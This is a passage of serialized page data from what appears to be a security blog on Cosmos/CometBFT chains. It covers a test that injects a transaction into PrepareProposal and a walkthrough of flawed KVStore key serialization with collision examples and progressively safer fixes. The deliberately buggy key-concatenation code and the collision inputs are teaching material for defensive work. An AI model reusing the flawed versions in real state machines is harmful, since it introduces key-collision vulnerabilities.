votes\"",{"type":27,"tag":207,"props":91793,"children":91794},{"style":238},[91795],{"type":33,"value":1123},{"type":27,"tag":207,"props":91797,"children":91798},{"style":1325},[91799],{"type":33,"value":91800},"\"err\"",{"type":27,"tag":207,"props":91802,"children":91803},{"style":238},[91804],{"type":33,"value":1123},{"type":27,"tag":207,"props":91806,"children":91807},{"style":220},[91808],{"type":33,"value":55659},{"type":27,"tag":207,"props":91810,"children":91811},{"style":238},[91812],{"type":33,"value":10449},{"type":27,"tag":207,"props":91814,"children":91815},{"class":209,"line":4103},[91816,91820,91824,91828],{"type":27,"tag":207,"props":91817,"children":91818},{"style":376},[91819],{"type":33,"value":67960},{"type":27,"tag":207,"props":91821,"children":91822},{"style":214},[91823],{"type":33,"value":89141},{"type":27,"tag":207,"props":91825,"children":91826},{"style":238},[91827],{"type":33,"value":1123},{"type":27,"tag":207,"props":91829,"children":91830},{"style":220},[91831],{"type":33,"value":90862},{"type":27,"tag":207,"props":91833,"children":91834},{"class":209,"line":4154},[91835],{"type":27,"tag":207,"props":91836,"children":91837},{"style":238},[91838],{"type":33,"value":66118},{"type":27,"tag":207,"props":91840,"children":91841},{"class":209,"line":4203},[91842],{"type":27,"tag":207,"props":91843,"children":91844},{"style":226},[91845],{"type":33,"value":89741},{"type":27,"tag":207,"props":91847,"children":91848},{"class":209,"line":4249},[91849],{"type":27,"tag":207,"props":91850,"children":91851},{"style":238},[91852],{"type":33,"value":10637},{"type":27,"tag":207,"props":91854,"children":91855},{"class":209,"line":4290},[91856,91861,91865,91869,91873,91878,91882,91887,91891,91895,91899,91903],{"type":27,"tag":207,"props":91857,"children":91858},{"style":220},[91859],{"type":33,"value":91860}," defaultRes",{"type":27,"tag":207,"props":91862,"children":91863},{"style":238},[91864],{"type":33,"value":1123},{"type":27,"tag":207,"props":91866,"children":91867},{"style":220},[91868],{"type":33,"value":55659},{"type":27,"tag":207,"props":91870,"children":91871},{"style":226},[91872],{"type":33,"value":83648},{"type":27,"tag":207,"props":91874,"children":91875},{"style":220},[91876],{"type":33,"value":91877}," h",{"type":27,"tag":207,"props":91879,"children":91880},{"style":238},[91881],{"type":33,"value":1041},{"type":27,"tag":207,"props":91883,"children":91884},{"style":1335},[91885],{"type":33,"value":91886},"defaultPrepareProposal",{"type":27,"tag":207,"props":91888,"children":91889},{"style":238},[91890],{"type":33,"value":1343},{"type":27,"tag":207,"props":91892,"children":91893},{"style":220},[91894],{"type":33,"value":27552},{"type":27,"tag":207,"props":91896,"children":91897},{"style":238},[91898],{"type":33,"value":1123},{"type":27,"tag":207,"props":91900,"children":91901},{"style":220},[91902],{"type":33,"value":91372},{"type":27,"tag":207,"props":91904,"children":91905},{"style":238},[91906],{"type":33,"value":10449},{"type":27,"tag":207,"props":91908,"children":91909},{"class":209,"line":4304},[91910],{"type":27,"tag":207,"props":91911,"children":91912},{"style":226},[91913],{"type":33,"value":89065},{"type":27,"tag":207,"props":91915,"children":91916},{"class":209,"line":5466},[91917,91922,91926,91931,91935],{"type":27,"tag":207,"props":91918,"children":91919},{"style":220},[91920],{"type":33,"value":91921}," proposalTxs",{"type":27,"tag":207,"props":91923,"children":91924},{"style":226},[91925],{"type":33,"value":83648},{"type":27,"tag":207,"props":91927,"children":91928},{"style":220},[91929],{"type":33,"value":91930}," defaultRes",{"type":27,"tag":207,"props":91932,"children":91933},{"style":238},[91934],{"type":33,"value":1041},{"type":27,"tag":207,"props":91936,"children":91937},{"style":220},[91938],{"type":33,"value":91939},"Txs\n",{"type":27,"tag":207,"props":91941,"children":91942},{"class":209,"line":5530},[91943,91947,91951,91955,91959],{"type":27,"tag":207,"props":91944,"children":91945},{"style":376},[91946],{"type":33,"value":10562},{"type":27,"tag":207,"props":91948,"children":91949},{"style":220},[91950],{"type":33,"value":91442},{"type":27,"tag":207,"props":91952,"children":91953},{"style":226},[91954],{"type":33,"value":71619},{"type":27,"tag":207,"props":91956,"children":91957},{"style":214},[91958],{"type":33,"value":89141},{"type":27,"tag":207,"props":91960,"children":91961},{"style":238},[91962],{"type":33,"value":384},{"type":27,"tag":207,"props":91964,"children":91965},{"class":209,"line":7900},[91966,91971,91975,91979,91984,91989,91993,91998,92002,92007,92011],{"type":27,"tag":207,"props":91967,"children":91968},{"style":220},[91969],{"type":33,"value":91970}," proposalTxs",{"type":27,"tag":207,"props":91972,"children":91973},{"style":226},[91974],{"type":33,"value":229},{"type":27,"tag":207,"props":91976,"children":91977},{"style":1335},[91978],{"type":33,"value":84927},{"type":27,"tag":207,"props":91980,"children":91981},{"style":238},[91982],{"type":33,"value":91983},"([][]",{"type":27,"tag":207,"props":91985,"children":91986},{"style":8920},[91987],{"type":33,"value":91988},"byte",{"type":27,"tag":207,"props":91990,"children":91991},{"style":238},[91992],{"type":33,"value":1322},{"type":27,"tag":207,"props":91994,"children":91995},{"style":220},[91996],{"type":33,"value":91997},"injection",{"type":27,"tag":207,"props":91999,"children":92000},{"style":238},[92001],{"type":33,"value":83868},{"type":27,"tag":207,"props":92003,"children":92004},{"style":220},[92005],{"type":33,"value":92006},"proposalTxs",{"type":27,"tag":207,"props":92008,"children":92009},{"style":226},[92010],{"type":33,"value":16867},{"type":27,"tag":207,"props":92012,"children":92013},{"style":238},[92014],{"type":33,"value":10449},{"type":27,"tag":207,"props":92016,"children":92017},{"class":209,"line":7909},[92018,92023,92027,92031,92035,92039,92043,92048,92052,92057,92061,92065,92069,92073],{"type":27,"tag":207,"props":92019,"children":92020},{"style":220},[92021],{"type":33,"value":92022}," h",{"type":27,"tag":207,"props":92024,"children":92025},{"style":238},[92026],{"type":33,"value":1041},{"type":27,"tag":207,"props":92028,"children":92029},{"style":220},[92030],{"type":33,"value":91774},{"type":27,"tag":207,"props":92032,"children":92033},{"style":238},[92034],{"type":33,"value":1041},{"type":27,"tag":207,"props":92036,"children":92037},{"style":1335},[92038],{"type":33,"value":31975},{"type":27,"tag":207,"props":92040,"children":92041},{"style":238},[92042],{"type":33,"value":1343},{"type":27,"tag":207,"props":92044,"children":92045},{"style":1325},[92046],{"type":33,"value":92047},"\"injected local last commit\"",{"type":27,"tag":207,"props":92049,"children":92050},{"style":238},[92051],{"type":33,"value":1123},{"type":27,"tag":207,"props":92053,"children":92054},{"style":1325},[92055],{"type":33,"value":92056},"\"height\"",{"type":27,"tag":207,"props":92058,"children":92059},{"style":238},[92060],{"type":33,"value":1123},{"type":27,"tag":207,"props":92062,"children":92063},{"style":220},[92064],{"type":33,"value":91372},{"type":27,"tag":207,"props":92066,"children":92067},{"style":238},[92068],{"type":33,"value":1041},{"type":27,"tag":207,"props":92070,"children":92071},{"style":220},[92072],{"type":33,"value":90702},{"type":27,"tag":207,"props":92074,"children":92075},{"style":238},[92076],{"type":33,"value":10449},{"type":27,"tag":207,"props":92078,"children":92079},{"class":209,"line":7917},[92080],{"type":27,"tag":207,"props":92081,"children":92082},{"style":238},[92083],{"type":33,"value":10637},{"type":27,"tag":207,"props":92085,"children":92086},{"class":209,"line":7926},[92087,92091,92095,92099,92103,92107],{"type":27,"tag":207,"props":92088,"children":92089},{"style":376},[92090],{"type":33,"value":23019},{"type":27,"tag":207,"props":92092,"children":92093},{"style":226},[92094],{"type":33,"value":14423},{"type":27,"tag":207,"props":92096,"children":92097},{"style":8920},[92098],{"type":33,"value":91381},{"type":27,"tag":207,"props":92100,"children":92101},{"style":238},[92102],{"type":33,"value":1041},{"type":27,"tag":207,"props":92104,"children":92105},{"style":8920},[92106],{"type":33,"value":91411},{"type":27,"tag":207,"props":92108,"children":92109},{"style":238},[92110],{"type":33,"value":18158},{"type":27,"tag":207,"props":92112,"children":92113},{"class":209,"line":7934},[92114,92119,92123,92127],{"type":27,"tag":207,"props":92115,"children":92116},{"style":220},[92117],{"type":33,"value":92118}," Txs",{"type":27,"tag":207,"props":92120,"children":92121},{"style":238},[92122],{"type":33,"value":22606},{"type":27,"tag":207,"props":92124,"children":92125},{"style":220},[92126],{"type":33,"value":92006},{"type":27,"tag":207,"props":92128,"children":92129},{"style":238},[92130],{"type":33,"value":1842},{"type":27,"tag":207,"props":92132,"children":92133},{"class":209,"line":7943},[92134,92139],{"type":27,"tag":207,"props":92135,"children":92136},{"style":238},[92137],{"type":33,"value":92138}," }, ",{"type":27,"tag":207,"props":92140,"children":92141},{"style":214},[92142],{"type":33,"value":83873},{"type":27,"tag":207,"props":92144,"children":92145},{"class":209,"line":7952},[92146],{"type":27,"tag":207,"props":92147,"children":92148},{"style":238},[92149],{"type":33,"value":10645},{"type":27,"tag":207,"props":92151,"children":92152},{"class":209,"line":7961},[92153],{"type":27,"tag":207,"props":92154,"children":92155},{"style":238},[92156],{"type":33,"value":451},{"type":27,"tag":36,"props":92158,"children":92159},{},[92160,92162,92167,92168,92173,92175,92182],{"type":33,"value":92161},"Aside from the more complex variant, pure validation mismatches are also still prevalent despite being a well-known attack surface. This stems from ",{"type":27,"tag":84,"props":92163,"children":92165},{"className":92164},[],[92166],{"type":33,"value":90531},{"type":33,"value":686},{"type":27,"tag":84,"props":92169,"children":92171},{"className":92170},[],[92172],{"type":33,"value":90599},{"type":33,"value":92174},") rejections by various obscure checks hidden within CometBTF. For example, this commit fixes a bug where ",{"type":27,"tag":47,"props":92176,"children":92179},{"href":92177,"rel":92178},"https://github.com/babylonlabs-io/babylon/commit/aa827f875a16ebf85efee5d9a6c8c4e76dbfb7bd#diff-77659089b31367690393a968f4bfacfd1bf960ed300965729df216a6fb612699",[51],[92180],{"type":33,"value":92181},"PrepareProposal may return a Proposal larger than MaxTxBytes",{"type":33,"value":92183},", which will later get rejected by CometBTF.",{"type":27,"tag":28,"props":92185,"children":92187},{"id":92186},"the-keymaker",[92188],{"type":33,"value":92189},"The Keymaker",{"type":27,"tag":36,"props":92191,"children":92192},{},[92193,92195,92201,92203,92208],{"type":33,"value":92194},"States (persistent storage) are another crucial component in state machines. Cosmos relies on a custom key-value storage called",{"type":27,"tag":84,"props":92196,"children":92198},{"className":92197},[],[92199],{"type":33,"value":92200},"KVStore",{"type":33,"value":92202}," to handle states efficently. In ",{"type":27,"tag":84,"props":92204,"children":92206},{"className":92205},[],[92207],{"type":33,"value":92200},{"type":33,"value":92209},", keys and values are both represented as simple byte slices, requiring developers to handle serialization and deserialization of more intricate structures when working with storage.",{"type":27,"tag":36,"props":92211,"children":92212},{},[92213],{"type":33,"value":92214},"The complexity behind proper data serialization often results in flawed code and security vulnerabilities. Below, we showcase relatively simple (but buggy) implementations and progressively address and mitigate the issues until the code is deemed safe from exploits.",{"type":27,"tag":36,"props":92216,"children":92217},{},[92218,92220,92226],{"type":33,"value":92219},"Let's start by considering a scenario where we need to store the ",{"type":27,"tag":84,"props":92221,"children":92223},{"className":92222},[],[92224],{"type":33,"value":92225},"positionMap",{"type":33,"value":92227}," structure mentioned below into storage.",{"type":27,"tag":101,"props":92229,"children":92231},{"code":92230,"language":83397,"meta":7,"className":83398,"style":7},"type VaultId uint64\ntype Username string\ntype PositionName string\ntype Position struct {\n data []byte\n}\ntype PositionMap :=\n map[VaultId]map[Username]map[PositionName]Position\n",[92232],{"type":27,"tag":84,"props":92233,"children":92234},{"__ignoreMap":7},[92235,92251,92268,92284,92303,92318,92325,92342],{"type":27,"tag":207,"props":92236,"children":92237},{"class":209,"line":210},[92238,92242,92247],{"type":27,"tag":207,"props":92239,"children":92240},{"style":214},[92241],{"type":33,"value":40014},{"type":27,"tag":207,"props":92243,"children":92244},{"style":8920},[92245],{"type":33,"value":92246}," VaultId",{"type":27,"tag":207,"props":92248,"children":92249},{"style":8920},[92250],{"type":33,"value":83435},{"type":27,"tag":207,"props":92252,"children":92253},{"class":209,"line":244},[92254,92258,92263],{"type":27,"tag":207,"props":92255,"children":92256},{"style":214},[92257],{"type":33,"value":40014},{"type":27,"tag":207,"props":92259,"children":92260},{"style":8920},[92261],{"type":33,"value":92262}," Username",{"type":27,"tag":207,"props":92264,"children":92265},{"style":8920},[92266],{"type":33,"value":92267}," string\n",{"type":27,"tag":207,"props":92269,"children":92270},{"class":209,"line":270},[92271,92275,92280],{"type":27,"tag":207,"props":92272,"children":92273},{"style":214},[92274],{"type":33,"value":40014},{"type":27,"tag":207,"props":92276,"children":92277},{"style":8920},[92278],{"type":33,"value":92279}," PositionName",{"type":27,"tag":207,"props":92281,"children":92282},{"style":8920},[92283],{"type":33,"value":92267},{"type":27,"tag":207,"props":92285,"children":92286},{"class":209,"line":296},[92287,92291,92295,92299],{"type":27,"tag":207,"props":92288,"children":92289},{"style":214},[92290],{"type":33,"value":40014},{"type":27,"tag":207,"props":92292,"children":92293},{"style":8920},[92294],{"type":33,"value":14707},{"type":27,"tag":207,"props":92296,"children":92297},{"style":214},[92298],{"type":33,"value":28423},{"type":27,"tag":207,"props":92300,"children":92301},{"style":238},[92302],{"type":33,"value":384},{"type":27,"tag":207,"props":92304,"children":92305},{"class":209,"line":445},[92306,92310,92314],{"type":27,"tag":207,"props":92307,"children":92308},{"style":220},[92309],{"type":33,"value":50477},{"type":27,"tag":207,"props":92311,"children":92312},{"style":238},[92313],{"type":33,"value":83460},{"type":27,"tag":207,"props":92315,"children":92316},{"style":8920},[92317],{"type":33,"value":91451},{"type":27,"tag":207,"props":92319,"children":92320},{"class":209,"line":867},[92321],{"type":27,"tag":207,"props":92322,"children":92323},{"style":238},[92324],{"type":33,"value":451},{"type":27,"tag":207,"props":92326,"children":92327},{"class":209,"line":892},[92328,92332,92337],{"type":27,"tag":207,"props":92329,"children":92330},{"style":214},[92331],{"type":33,"value":40014},{"type":27,"tag":207,"props":92333,"children":92334},{"style":8920},[92335],{"type":33,"value":92336}," PositionMap",{"type":27,"tag":207,"props":92338,"children":92339},{"style":226},[92340],{"type":33,"value":92341}," :=\n",{"type":27,"tag":207,"props":92343,"children":92344},{"class":209,"line":1475},[92345,92350,92354,92359,92363,92367,92371,92376,92380,92384,92388,92393,92397],{"type":27,"tag":207,"props":92346,"children":92347},{"style":214},[92348],{"type":33,"value":92349}," map",{"type":27,"tag":207,"props":92351,"children":92352},{"style":238},[92353],{"type":33,"value":11019},{"type":27,"tag":207,"props":92355,"children":92356},{"style":8920},[92357],{"type":33,"value":92358},"VaultId",{"type":27,"tag":207,"props":92360,"children":92361},{"style":238},[92362],{"type":33,"value":22686},{"type":27,"tag":207,"props":92364,"children":92365},{"style":214},[92366],{"type":33,"value":74335},{"type":27,"tag":207,"props":92368,"children":92369},{"style":238},[92370],{"type":33,"value":11019},{"type":27,"tag":207,"props":92372,"children":92373},{"style":8920},[92374],{"type":33,"value":92375},"Username",{"type":27,"tag":207,"props":92377,"children":92378},{"style":238},[92379],{"type":33,"value":22686},{"type":27,"tag":207,"props":92381,"children":92382},{"style":214},[92383],{"type":33,"value":74335},{"type":27,"tag":207,"props":92385,"children":92386},{"style":238},[92387],{"type":33,"value":11019},{"type":27,"tag":207,"props":92389,"children":92390},{"style":8920},[92391],{"type":33,"value":92392},"PositionName",{"type":27,"tag":207,"props":92394,"children":92395},{"style":238},[92396],{"type":33,"value":22686},{"type":27,"tag":207,"props":92398,"children":92399},{"style":8920},[92400],{"type":33,"value":92401},"Position\n",{"type":27,"tag":36,"props":92403,"children":92404},{},[92405,92407,92413],{"type":33,"value":92406},"Given that there are two levels of keys in ",{"type":27,"tag":84,"props":92408,"children":92410},{"className":92409},[],[92411],{"type":33,"value":92412},"PositionMap",{"type":33,"value":92414},", we should try to serialize these three map keys into a hierarchically searchable storage key. The most straightforward mitigation is to convert all fields into strings and concat them together.",{"type":27,"tag":101,"props":92416,"children":92418},{"code":92417,"language":83397,"meta":7,"className":83398,"style":7},"storageKey := fmt.Sprintf(\n \"%d%s%s\",\n vaultId,\n username,\n positionName,\n)\n",[92419],{"type":27,"tag":84,"props":92420,"children":92421},{"__ignoreMap":7},[92422,92451,92463,92475,92487,92499],{"type":27,"tag":207,"props":92423,"children":92424},{"class":209,"line":210},[92425,92430,92434,92438,92442,92447],{"type":27,"tag":207,"props":92426,"children":92427},{"style":220},[92428],{"type":33,"value":92429},"storageKey",{"type":27,"tag":207,"props":92431,"children":92432},{"style":226},[92433],{"type":33,"value":83648},{"type":27,"tag":207,"props":92435,"children":92436},{"style":220},[92437],{"type":33,"value":89457},{"type":27,"tag":207,"props":92439,"children":92440},{"style":238},[92441],{"type":33,"value":1041},{"type":27,"tag":207,"props":92443,"children":92444},{"style":1335},[92445],{"type":33,"value":92446},"Sprintf",{"type":27,"tag":207,"props":92448,"children":92449},{"style":238},[92450],{"type":33,"value":9090},{"type":27,"tag":207,"props":92452,"children":92453},{"class":209,"line":244},[92454,92459],{"type":27,"tag":207,"props":92455,"children":92456},{"style":1325},[92457],{"type":33,"value":92458}," \"%d%s%s\"",{"type":27,"tag":207,"props":92460,"children":92461},{"style":238},[92462],{"type":33,"value":1842},{"type":27,"tag":207,"props":92464,"children":92465},{"class":209,"line":270},[92466,92471],{"type":27,"tag":207,"props":92467,"children":92468},{"style":220},[92469],{"type":33,"value":92470}," vaultId",{"type":27,"tag":207,"props":92472,"children":92473},{"style":238},[92474],{"type":33,"value":1842},{"type":27,"tag":207,"props":92476,"children":92477},{"class":209,"line":296},[92478,92483],{"type":27,"tag":207,"props":92479,"children":92480},{"style":220},[92481],{"type":33,"value":92482}," username",{"type":27,"tag":207,"props":92484,"children":92485},{"style":238},[92486],{"type":33,"value":1842},{"type":27,"tag":207,"props":92488,"children":92489},{"class":209,"line":445},[92490,92495],{"type":27,"tag":207,"props":92491,"children":92492},{"style":220},[92493],{"type":33,"value":92494}," positionName",{"type":27,"tag":207,"props":92496,"children":92497},{"style":238},[92498],{"type":33,"value":1842},{"type":27,"tag":207,"props":92500,"children":92501},{"class":209,"line":867},[92502],{"type":27,"tag":207,"props":92503,"children":92504},{"style":238},[92505],{"type":33,"value":10449},{"type":27,"tag":36,"props":92507,"children":92508},{},[92509],{"type":33,"value":92510},"Although plain concatenation allows us to easily construct a storage key, it becomes apparent that this implementation is prone to key collisions.",{"type":27,"tag":101,"props":92512,"children":92514},{"code":92513},"vaultId = 1, username = \"2a\", positionName = \"b\"\n => storageKey = \"12ab\"\n\nvaultId = 12, username = \"a\", positionName = \"b\"\n => storageKey = \"12ab\"\n",[92515],{"type":27,"tag":84,"props":92516,"children":92517},{"__ignoreMap":7},[92518],{"type":33,"value":92513},{"type":27,"tag":36,"props":92520,"children":92521},{},[92522,92527],{"type":27,"tag":942,"props":92523,"children":92524},{},[92525],{"type":33,"value":92526},"So, how can we mitigate this issue?",{"type":33,"value":92528},"\nPerhaps we can add a field separator between each field, which would resemble the following:",{"type":27,"tag":101,"props":92530,"children":92532},{"code":92531,"language":83397,"meta":7,"className":83398,"style":7},"const (\n Seperator = \"|\"\n)\n\nstorageKey := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n username,\n Seperator,\n positionName,\n)\n",[92533],{"type":27,"tag":84,"props":92534,"children":92535},{"__ignoreMap":7},[92536,92547,92564,92571,92578,92605,92617,92628,92639,92650,92661,92672],{"type":27,"tag":207,"props":92537,"children":92538},{"class":209,"line":210},[92539,92543],{"type":27,"tag":207,"props":92540,"children":92541},{"style":214},[92542],{"type":33,"value":16931},{"type":27,"tag":207,"props":92544,"children":92545},{"style":238},[92546],{"type":33,"value":85797},{"type":27,"tag":207,"props":92548,"children":92549},{"class":209,"line":244},[92550,92555,92559],{"type":27,"tag":207,"props":92551,"children":92552},{"style":220},[92553],{"type":33,"value":92554}," Seperator",{"type":27,"tag":207,"props":92556,"children":92557},{"style":226},[92558],{"type":33,"value":229},{"type":27,"tag":207,"props":92560,"children":92561},{"style":1325},[92562],{"type":33,"value":92563}," \"|\"\n",{"type":27,"tag":207,"props":92565,"children":92566},{"class":209,"line":270},[92567],{"type":27,"tag":207,"props":92568,"children":92569},{"style":238},[92570],{"type":33,"value":10449},{"type":27,"tag":207,"props":92572,"children":92573},{"class":209,"line":296},[92574],{"type":27,"tag":207,"props":92575,"children":92576},{"emptyLinePlaceholder":19},[92577],{"type":33,"value":2062},{"type":27,"tag":207,"props":92579,"children":92580},{"class":209,"line":445},[92581,92585,92589,92593,92597,92601],{"type":27,"tag":207,"props":92582,"children":92583},{"style":220},[92584],{"type":33,"value":92429},{"type":27,"tag":207,"props":92586,"children":92587},{"style":226},[92588],{"type":33,"value":83648},{"type":27,"tag":207,"props":92590,"children":92591},{"style":220},[92592],{"type":33,"value":89457},{"type":27,"tag":207,"props":92594,"children":92595},{"style":238},[92596],{"type":33,"value":1041},{"type":27,"tag":207,"props":92598,"children":92599},{"style":1335},[92600],{"type":33,"value":92446},{"type":27,"tag":207,"props":92602,"children":92603},{"style":238},[92604],{"type":33,"value":9090},{"type":27,"tag":207,"props":92606,"children":92607},{"class":209,"line":867},[92608,92613],{"type":27,"tag":207,"props":92609,"children":92610},{"style":1325},[92611],{"type":33,"value":92612}," \"%d%s%s%s%s\"",{"type":27,"tag":207,"props":92614,"children":92615},{"style":238},[92616],{"type":33,"value":1842},{"type":27,"tag":207,"props":92618,"children":92619},{"class":209,"line":892},[92620,92624],{"type":27,"tag":207,"props":92621,"children":92622},{"style":220},[92623],{"type":33,"value":92470},{"type":27,"tag":207,"props":92625,"children":92626},{"style":238},[92627],{"type":33,"value":1842},{"type":27,"tag":207,"props":92629,"children":92630},{"class":209,"line":1475},[92631,92635],{"type":27,"tag":207,"props":92632,"children":92633},{"style":220},[92634],{"type":33,"value":92554},{"type":27,"tag":207,"props":92636,"children":92637},{"style":238},[92638],{"type":33,"value":1842},{"type":27,"tag":207,"props":92640,"children":92641},{"class":209,"line":2065},[92642,92646],{"type":27,"tag":207,"props":92643,"children":92644},{"style":220},[92645],{"type":33,"value":92482},{"type":27,"tag":207,"props":92647,"children":92648},{"style":238},[92649],{"type":33,"value":1842},{"type":27,"tag":207,"props":92651,"children":92652},{"class":209,"line":2092},[92653,92657],{"type":27,"tag":207,"props":92654,"children":92655},{"style":220},[92656],{"type":33,"value":92554},{"type":27,"tag":207,"props":92658,"children":92659},{"style":238},[92660],{"type":33,"value":1842},{"type":27,"tag":207,"props":92662,"children":92663},{"class":209,"line":2130},[92664,92668],{"type":27,"tag":207,"props":92665,"children":92666},{"style":220},[92667],{"type":33,"value":92494},{"type":27,"tag":207,"props":92669,"children":92670},{"style":238},[92671],{"type":33,"value":1842},{"type":27,"tag":207,"props":92673,"children":92674},{"class":209,"line":2168},[92675],{"type":27,"tag":207,"props":92676,"children":92677},{"style":238},[92678],{"type":33,"value":10449},{"type":27,"tag":36,"props":92680,"children":92681},{},[92682],{"type":33,"value":92683},"Inserting a separator helps prevent most accidental collisions, but does it completely solve the problem?",{"type":27,"tag":36,"props":92685,"children":92686},{},[92687,92689,92695,92696,92702],{"type":33,"value":92688},"Sadly, it doesn't. Since the ",{"type":27,"tag":84,"props":92690,"children":92692},{"className":92691},[],[92693],{"type":33,"value":92694},"username",{"type":33,"value":1131},{"type":27,"tag":84,"props":92697,"children":92699},{"className":92698},[],[92700],{"type":33,"value":92701},"vaultName",{"type":33,"value":92703}," are both strings that may contain arbitrary characters (including the separator), collisions can still happen.",{"type":27,"tag":101,"props":92705,"children":92707},{"code":92706},"vaultId = 1, username = \"a|\", positionName = \"b\"\n => storageKey = \"1|a||b\"\n\nvaultId = 1, username = \"a\", positionName = \"|b\"\n => storageKey = \"1|a||b\"\n",[92708],{"type":27,"tag":84,"props":92709,"children":92710},{"__ignoreMap":7},[92711],{"type":33,"value":92706},{"type":27,"tag":36,"props":92713,"children":92714},{},[92715],{"type":33,"value":92716},"To further mitigate this, we could encode all fields to ensure that the separator is excluded in individual fields, thus making field injections impossible.",{"type":27,"tag":101,"props":92718,"children":92720},{"code":92719,"language":83397,"meta":7,"className":83398,"style":7},"const (\n Seperator = \"|\"\n)\n\n\nusernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n)\nhex.Encode(usernameEncoded, username)\n\npositionNameEncoded := make(\n []byte,\n hex.EncodedLen(len(positionName)),\n)\nhex.Encode(positionNameEncoded, positionName)\n\nstorageKey := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n positionNameEncoded\n)\n",[92721],{"type":27,"tag":84,"props":92722,"children":92723},{"__ignoreMap":7},[92724,92735,92750,92757,92764,92771,92792,92808,92846,92853,92890,92897,92917,92932,92968,92975,93010,93017,93044,93055,93066,93077,93089,93100,93108],{"type":27,"tag":207,"props":92725,"children":92726},{"class":209,"line":210},[92727,92731],{"type":27,"tag":207,"props":92728,"children":92729},{"style":214},[92730],{"type":33,"value":16931},{"type":27,"tag":207,"props":92732,"children":92733},{"style":238},[92734],{"type":33,"value":85797},{"type":27,"tag":207,"props":92736,"children":92737},{"class":209,"line":244},[92738,92742,92746],{"type":27,"tag":207,"props":92739,"children":92740},{"style":220},[92741],{"type":33,"value":92554},{"type":27,"tag":207,"props":92743,"children":92744},{"style":226},[92745],{"type":33,"value":229},{"type":27,"tag":207,"props":92747,"children":92748},{"style":1325},[92749],{"type":33,"value":92563},{"type":27,"tag":207,"props":92751,"children":92752},{"class":209,"line":270},[92753],{"type":27,"tag":207,"props":92754,"children":92755},{"style":238},[92756],{"type":33,"value":10449},{"type":27,"tag":207,"props":92758,"children":92759},{"class":209,"line":296},[92760],{"type":27,"tag":207,"props":92761,"children":92762},{"emptyLinePlaceholder":19},[92763],{"type":33,"value":2062},{"type":27,"tag":207,"props":92765,"children":92766},{"class":209,"line":445},[92767],{"type":27,"tag":207,"props":92768,"children":92769},{"emptyLinePlaceholder":19},[92770],{"type":33,"value":2062},{"type":27,"tag":207,"props":92772,"children":92773},{"class":209,"line":867},[92774,92779,92783,92788],{"type":27,"tag":207,"props":92775,"children":92776},{"style":220},[92777],{"type":33,"value":92778},"usernameEncoded",{"type":27,"tag":207,"props":92780,"children":92781},{"style":226},[92782],{"type":33,"value":83648},{"type":27,"tag":207,"props":92784,"children":92785},{"style":1335},[92786],{"type":33,"value":92787}," make",{"type":27,"tag":207,"props":92789,"children":92790},{"style":238},[92791],{"type":33,"value":9090},{"type":27,"tag":207,"props":92793,"children":92794},{"class":209,"line":892},[92795,92800,92804],{"type":27,"tag":207,"props":92796,"children":92797},{"style":238},[92798],{"type":33,"value":92799}," []",{"type":27,"tag":207,"props":92801,"children":92802},{"style":8920},[92803],{"type":33,"value":91988},{"type":27,"tag":207,"props":92805,"children":92806},{"style":238},[92807],{"type":33,"value":1842},{"type":27,"tag":207,"props":92809,"children":92810},{"class":209,"line":1475},[92811,92816,92820,92825,92829,92833,92837,92841],{"type":27,"tag":207,"props":92812,"children":92813},{"style":220},[92814],{"type":33,"value":92815}," hex",{"type":27,"tag":207,"props":92817,"children":92818},{"style":238},[92819],{"type":33,"value":1041},{"type":27,"tag":207,"props":92821,"children":92822},{"style":1335},[92823],{"type":33,"value":92824},"EncodedLen",{"type":27,"tag":207,"props":92826,"children":92827},{"style":238},[92828],{"type":33,"value":1343},{"type":27,"tag":207,"props":92830,"children":92831},{"style":1335},[92832],{"type":33,"value":16416},{"type":27,"tag":207,"props":92834,"children":92835},{"style":238},[92836],{"type":33,"value":1343},{"type":27,"tag":207,"props":92838,"children":92839},{"style":220},[92840],{"type":33,"value":92694},{"type":27,"tag":207,"props":92842,"children":92843},{"style":238},[92844],{"type":33,"value":92845},")),\n",{"type":27,"tag":207,"props":92847,"children":92848},{"class":209,"line":2065},[92849],{"type":27,"tag":207,"props":92850,"children":92851},{"style":238},[92852],{"type":33,"value":10449},{"type":27,"tag":207,"props":92854,"children":92855},{"class":209,"line":2092},[92856,92861,92865,92870,92874,92878,92882,92886],{"type":27,"tag":207,"props":92857,"children":92858},{"style":220},[92859],{"type":33,"value":92860},"hex",{"type":27,"tag":207,"props":92862,"children":92863},{"style":238},[92864],{"type":33,"value":1041},{"type":27,"tag":207,"props":92866,"children":92867},{"style":1335},[92868],{"type":33,"value":92869},"Encode",{"type":27,"tag":207,"props":92871,"children":92872},{"style":238},[92873],{"type":33,"value":1343},{"type":27,"tag":207,"props":92875,"children":92876},{"style":220},[92877],{"type":33,"value":92778},{"type":27,"tag":207,"props":92879,"children":92880},{"style":238},[92881],{"type":33,"value":1123},{"type":27,"tag":207,"props":92883,"children":92884},{"style":220},[92885],{"type":33,"value":92694},{"type":27,"tag":207,"props":92887,"children":92888},{"style":238},[92889],{"type":33,"value":10449},{"type":27,"tag":207,"props":92891,"children":92892},{"class":209,"line":2130},[92893],{"type":27,"tag":207,"props":92894,"children":92895},{"emptyLinePlaceholder":19},[92896],{"type":33,"value":2062},{"type":27,"tag":207,"props":92898,"children":92899},{"class":209,"line":2168},[92900,92905,92909,92913],{"type":27,"tag":207,"props":92901,"children":92902},{"style":220},[92903],{"type":33,"value":92904},"positionNameEncoded",{"type":27,"tag":207,"props":92906,"children":92907},{"style":226},[92908],{"type":33,"value":83648},{"type":27,"tag":207,"props":92910,"children":92911},{"style":1335},[92912],{"type":33,"value":92787},{"type":27,"tag":207,"props":92914,"children":92915},{"style":238},[92916],{"type":33,"value":9090},{"type":27,"tag":207,"props":92918,"children":92919},{"class":209,"line":4095},[92920,92924,92928],{"type":27,"tag":207,"props":92921,"children":92922},{"style":238},[92923],{"type":33,"value":92799},{"type":27,"tag":207,"props":92925,"children":92926},{"style":8920},[92927],{"type":33,"value":91988},{"type":27,"tag":207,"props":92929,"children":92930},{"style":238},[92931],{"type":33,"value":1842},{"type":27,"tag":207,"props":92933,"children":92934},{"class":209,"line":4103},[92935,92939,92943,92947,92951,92955,92959,92964],{"type":27,"tag":207,"props":92936,"children":92937},{"style":220},[92938],{"type":33,"value":92815},{"type":27,"tag":207,"props":92940,"children":92941},{"style":238},[92942],{"type":33,"value":1041},{"type":27,"tag":207,"props":92944,"